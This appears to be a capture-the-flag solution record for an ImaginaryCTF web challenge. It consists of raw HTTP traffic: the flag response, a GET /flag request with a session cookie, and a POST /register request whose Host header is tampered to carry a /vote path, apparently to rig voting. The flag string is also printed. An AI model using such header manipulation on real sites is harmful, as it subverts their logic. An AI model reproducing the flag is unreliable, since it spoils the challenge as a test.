HTTP/1.1 200 OK
Server: Werkzeug/2.1.2 Python/3.8.10
Date: Sat, 16 Jul 2022 04:48:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 126
Connection: close

Congrats on being voted most worthy to recieve the flag! ictf{i'm_sure_you_0btained_this_flag_with0ut_any_sort_of_trickery...}


查看
GET /flag HTTP/1.1
Host: chal.imaginaryctf.org:1339
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://chal.imaginaryctf.org:1339/user/a8307531d6084856aef11a1bebe431be
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Cookie: user=77f84cbd6f9b5a03bb12980862e56f767ae9debf441bdaf1b38174c6ba6c4674


註冊
POST /register HTTP/1.1
Host: chal.imaginaryctf.org:1339/vote/a380a2408a264031b2d76fca4408da4c
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://chal.imaginaryctf.org:1339
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://chal.imaginaryctf.org:1339/register
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
user=KerKer000&pass=12345